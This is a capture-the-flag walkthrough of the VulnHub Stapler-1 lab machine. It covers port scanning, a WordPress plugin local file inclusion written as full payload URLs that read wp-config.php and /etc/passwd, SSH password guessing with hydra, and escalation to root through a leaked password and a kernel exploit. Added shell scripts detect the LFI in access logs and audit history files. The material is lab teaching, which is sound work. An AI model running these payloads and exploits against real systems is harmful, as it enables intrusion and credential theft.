Target machine: Stapler-1 ~ VulnHub
Difficulty: 3.0 / 10.0
This article briefly records each step of the penetration test against the target machine. Not every step is described in full detail, and some of the content may contain mistakes; readers are welcome to point them out. Thanks!
Summary: After the port scan, ports 21, 22 and 80 yield a few hints and user names. Port 12380 is then visited and scanned with nikto, which reveals several directories; /blogblog is a WordPress site. Browsing its wp-content directory shows the installed plugins, and the advanced-video-embed plugin has a file inclusion vulnerability that reads /etc/passwd and the MySQL credentials in wp-config.php. With those user names and the password in hand, hydra finds a valid account and gives a low-privilege shell. From there, privilege escalation is possible either through a kernel exploit or by following the hints to find peter's password and logging in as peter, who can use sudo directly. To be improved: the commands used to process the files (cut, awk, etc.), and writing a bash script to run the chosen commands automatically.
Host discovery & port scan
The target IP is 192.168.1.10
Port scan results:
hh@Kali2020:~$ sudo nmap -sS -T5 -p- --open 192.168.1.10
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 11:46 CST
Nmap scan report for red.initech (192.168.1.10)
Host is up (0.00019s latency).
Not shown: 65523 filtered ports, 4 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
12380/tcp open unknown
MAC Address: 00:0C:29:77:E0:EA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 54.08 seconds
Information gathering
Port 80
Nothing useful here; move on to the other ports.
Port 22
No password, but the banner gives the user name Barry.
Port 12380
- Nmap reported this port as unknown, so rescan it in detail
hhh@Kali2020:~$ sudo nmap -A -p 12380 -sV -sS 192.168.1.10
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 13:23 CST
Nmap scan report for red.initech (192.168.1.10)
Host is up (0.00023s latency).
PORT STATE SERVICE VERSION
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
MAC Address: 00:0C:29:77:E0:EA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.23 ms red.initech (192.168.1.10)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.16 seconds
It is Apache httpd 2.4.18 ((Ubuntu)), and the site opens in the browser.
- Scanning with nikto shows that the site uses SSL and reveals three directories
hhh@Kali2020:~$ nikto -h 192.168.1.10:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.10
+ Target Hostname: 192.168.1.10
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2021-02-03 13:02:03 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.1.10' does not match certificate's names: Red.Initech
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2021-02-03 13:04:00 (GMT8) (117 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- Visit the three directories
https://192.168.1.10:12380/admin112233
shows a hint:
This could of been a BeEF-XSS hook ;)
https://192.168.1.10:12380/blogblog
is a blog
https://192.168.1.10:12380/phpmyadmin
is a login page
- Start from the /blogblog directory: scanning it with dirb shows that it is a WordPress site
hhh@Kali2020:~$ dirb https://192.168.1.10:12380/blogblog
---- Scanning URL: https://192.168.1.10:12380/blogblog/ ----
+ https://192.168.1.10:12380/blogblog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-admin/
==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-content/
==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-includes/
Gaining access
Route one: plugin vulnerability
- First open the plugins directory and list the plugins; each plugin folder contains a readme.md file that shows its version
https://192.168.1.10:12380/blogblog/wp-content/plugins/
- For the advanced-video-embed plugin, a Google search turns up the advisory "WordPress Plugin Advanced Video 1.0 - Local File Inclusion". It is a local file inclusion vulnerability; follow the instructions in that advisory.
- Read the wp-config configuration file
https://192.168.1.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
After the request, the page displays a URL; following it leads to a .jpeg file. Download it and the contents of wp-config.php are inside.
wget --no-check-certificate https://192.168.1.10:12380/blogblog/wp-content/uploads/974197914.jpeg
--no-check-certificate: skip certificate verification; needed when fetching files from HTTPS sites
The database root password is visible: root : plbkac
hhh@Kali2020:~$ cat 974197914.jpeg
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
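From the defender's side, the request pattern used above is easy to spot in the web server's access log. The following is an added example, not part of the original write-up: a small sh/awk filter that flags ave_publishPost requests whose thumb parameter is a traversal or an absolute path. The log lines are constructed for the demo; the client IPs and user agents are made up.

```shell
#!/bin/sh
# Added example, not from the original write-up: flag access-log requests that use
# the advanced-video-embed thumb parameter to pull arbitrary files.
# Log lines are constructed (Apache combined format); IPs and agents are made up.
ACCESS_LOG_SAMPLE='192.168.1.50 - - [03/Feb/2021:13:40:01 +0800] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.1.50 - - [03/Feb/2021:13:41:12 +0800] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd HTTP/1.1" 200 298 "-" "Mozilla/5.0"
192.168.1.77 - - [03/Feb/2021:13:42:30 +0800] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=post&short=1&term=1&thumb=https%3A%2F%2Fexample.org%2Fcover.jpg HTTP/1.1" 200 301 "-" "Mozilla/5.0"
192.168.1.77 - - [03/Feb/2021:13:43:05 +0800] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=x&short=1&term=1&thumb=..%2F..%2Fwp-config.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.1.80 - - [03/Feb/2021:13:44:00 +0800] "GET /blogblog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'

# Reads log lines on stdin and prints "ip timestamp thumb" for every ave_publishPost
# request whose thumb value starts with ../ (raw or %2F-encoded) or with an
# absolute path. A normal remote thumbnail URL (https://...) is not flagged.
find_ave_lfi() {
  grep -E 'action=ave_publishPost' \
    | grep -Ei 'thumb=(\.\.(/|%2f)|/|%2f)' \
    | awk '{ ts = $4; sub(/^\[/, "", ts); split($7, q, "thumb="); print $1, ts, q[2] }'
}

# Number of flagged requests in the sample (used by the self-check).
count_ave_lfi() { printf '%s\n' "$ACCESS_LOG_SAMPLE" | find_ave_lfi | wc -l | tr -d ' '; }

printf '%s\n' "$ACCESS_LOG_SAMPLE" | find_ave_lfi   # three lines: two from .50, one from .77
```

Pipe a real access log into find_ave_lfi instead of the sample to run it against live data; the https thumbnail request in the sample shows that ordinary plugin use is not reported.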
- Read /etc/passwd the same way as in the previous step to view its contents
https://192.168.1.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd
Part of the passwd file:
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
- Pull the useful information out of /etc/passwd with cut (Linux cut command)
cat 1097971703.jpeg | grep /bin/bash | cut -d ":" -f1 > user.txt
-d: set the delimiter; here the colon : is the delimiter
-f1: select which field to print; here the first field
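The grep /bin/bash pipeline misses accounts whose shell is sh, zsh or dash (Sam and CCeaser above, for instance). As an added example, not from the original write-up, the awk version below lists every account with a login shell and then narrows to the human accounts; the passwd excerpt is constructed from the entries shown above plus a few typical system accounts.

```shell
#!/bin/sh
# Added example, not from the original write-up. Generalises the
# "grep /bin/bash | cut" pipeline: list every account with a real login shell
# (anything except nologin/false/sync), which the grep-only version misses for
# sh, zsh and dash. The sample is a constructed excerpt modelled on the page.
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
Sam:x:1019:1019::/home/Sam:/bin/zsh
zoe:x:1026:1026::/home/zoe:/bin/bash
www:x:1028:1028::/home/www:
nobody:x:65534:65534:nobody:/nonexistent:/bin/false'

# Print "user uid shell" for accounts whose shell allows an interactive login.
# Field 7 is the shell; an empty field means the system default (/bin/sh),
# so it counts as a login shell too. Reads passwd lines on stdin.
login_shell_accounts() {
  awk -F: '{
    shell = ($7 == "") ? "/bin/sh (default)" : $7
    if (shell !~ /(nologin|false|sync)$/) print $1, $3, shell
  }'
}

# Only the human accounts (UID >= 1000): the ones a password-reuse review
# should cover. Service accounts are reviewed separately.
human_login_accounts() { login_shell_accounts | awk '$2 >= 1000 { print $1 }'; }

# Number of human login accounts in the sample (used by the self-check).
count_human_login_accounts() {
  printf '%s\n' "$PASSWD_SAMPLE" | human_login_accounts | wc -l | tr -d ' '
}

printf '%s\n' "$PASSWD_SAMPLE" | login_shell_accounts   # root, CCeaser, JKanode, Sam, zoe, www
```

Replace the sample with `cat /etc/passwd` to audit a real system; the www entry shows why an empty shell field must not be skipped.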
- Use hydra to test the password against the collected user names
hydra 192.168.1.10 ssh -L user.txt -p plbkac
It finds a valid login: user zoe with password plbkac
- Log in over SSH
ssh zoe@192.168.1.10
Privilege escalation
Method one: switch to the peter user
Going through the files under /home, the peter directory looks different from the others
zoe@red:/home$ ls -alhR
Contents of the peter directory:
./peter:
total 72K
drwxr-xr-x 3 peter peter 4.0K Jun 3 2016 .
drwxr-xr-x 32 root root 4.0K Jun 4 2016 ..
-rw------- 1 peter peter 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 peter peter 220 Jun 3 2016 .bash_logout
-rw-r--r-- 1 peter peter 3.7K Jun 3 2016 .bashrc
drwx------ 2 peter peter 4.0K Jun 6 2016 .cache
-rw-r--r-- 1 peter peter 675 Jun 3 2016 .profile
-rw-r--r-- 1 peter peter 0 Jun 3 2016 .sudo_as_admin_successful
-rw------- 1 peter peter 577 Jun 3 2016 .viminfo
-rw-rw-r-- 1 peter peter 39K Jun 3 2016 .zcompdump
ls: cannot open directory './peter/.cache': Permission denied
Given this hint, the next step is to try logging in as peter.
While inspecting each user's .bash_history file: using bash, first write all the directory names under /home into an array, then run the one-liner below, which repeats 30 times and runs cd, pwd, cat and cd back each time. JKanode's .bash_history differs from the rest, and from it peter's password turns out to be JZQuyIN5
zoe@red:/home$ array=(AParnell Drew elly jamie JKanode LSolum mel peter SHAY Taylor CCeaser DSwanger ETollefson JBare JLipps LSolum2 MFrei RNunemaker SHayslett www CJoo Eeth IChadwick jess kai MBassin NATHAN Sam SStroud zoe)
zoe@red:/home$ for i in {0..29}; do cd ./${array[$i]}; pwd; cat .bash_history; cd ../; done
Partial output:
/home/AParnell
exit
/home/Drew
exit
/home/elly
exit
/home/jamie
top
ps aux
exit
/home/JKanode
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
/home/LSolum
exit
Log in as peter
su peter
sudo cat /root/flag.txt
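The loop above works because other users' .bash_history files were readable and one of them had passwords typed on the command line. As an added example, not part of the original write-up, the audit below checks a home tree for both conditions; it builds a throw-away tree under mktemp with fake passwords and assumes GNU find and stat.

```shell
#!/bin/sh
# Added example, not from the original write-up. Audits a home tree for the two
# weaknesses the history loop relied on: .bash_history files readable by other
# users, and passwords typed inline on the command line (sshpass -p ...).
# Needs GNU find/stat. The demo tree and its passwords are constructed.

# Print "<user> <octal mode>" for every .bash_history readable by group or other.
exposed_histories() {
  find "$1" -mindepth 2 -maxdepth 2 -name .bash_history -perm /044 \
    -exec sh -c 'for f; do printf "%s %s\n" "$(basename "$(dirname "$f")")" "$(stat -c %a "$f")"; done' sh {} +
}

# Print "<user> <line> sshpass" for history lines carrying an inline password.
# Only the tool name is printed, never the secret itself.
inline_password_lines() {
  find "$1" -mindepth 2 -maxdepth 2 -name .bash_history -readable -exec awk '
    /sshpass +-p +[^ ]+/ {
      u = FILENAME; sub(/\/[^\/]*$/, "", u); sub(/.*\//, "", u)   # home dir name = user
      print u, FNR, $1
    }' {} +
}

# Constructed demo home tree mirroring the page's findings (fake passwords).
make_demo_home() {
  d=$(mktemp -d)
  for u in zoe JKanode peter; do mkdir "$d/$u"; done
  printf 'exit\n' > "$d/zoe/.bash_history"
  printf 'id\nsshpass -p FAKEPASS1 ssh JKanode@localhost\nsshpass -p FAKEPASS2 peter@localhost\nexit\n' \
    > "$d/JKanode/.bash_history"
  printf 'exit\n' > "$d/peter/.bash_history"
  chmod 644 "$d/zoe/.bash_history" "$d/JKanode/.bash_history"
  chmod 600 "$d/peter/.bash_history"
  printf '%s\n' "$d"
}

DEMO_HOME=$(make_demo_home)
exposed_histories "$DEMO_HOME"        # two lines: zoe 644 and JKanode 644 (peter's 600 is not listed)
inline_password_lines "$DEMO_HOME"    # JKanode 2 sshpass, JKanode 3 sshpass
rm -rf "$DEMO_HOME"
```

Run the two functions against /home on a real system; the fix for the first finding is mode 600 on history files (as peter's already is), and for the second, clearing the history and rotating the password that was typed.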
Method two: privilege escalation through a system vulnerability
Check the target's details: Ubuntu 16.04 | Linux kernel 4.4.0
root@red:~# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
root@red:~# uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
Search Google for related vulnerabilities, or use the les.sh tool to enumerate the likely ones.
Here exploit-db was searched for "Linux Kernel 4.4 Ubuntu 16.04", and the following exploit was chosen:
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
Following its instructions, first transfer the files to the target through a simple Python HTTP server (serving files to a target with a simple Python HTTP server was covered in the previous write-ups).
Make the files executable, run compile.sh, then run ./doubleput; privilege escalation succeeds.
zoe@red:~$ ./compile.sh
zoe@red:~$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~# id
uid=0(root) gid=0(root) groups=0(root),1026(zoe)
Summary
- SSL
- WordPress plugin vulnerabilities
- string manipulation | awk command | cut command
- ls -R command
- writing bash scripts to automate searching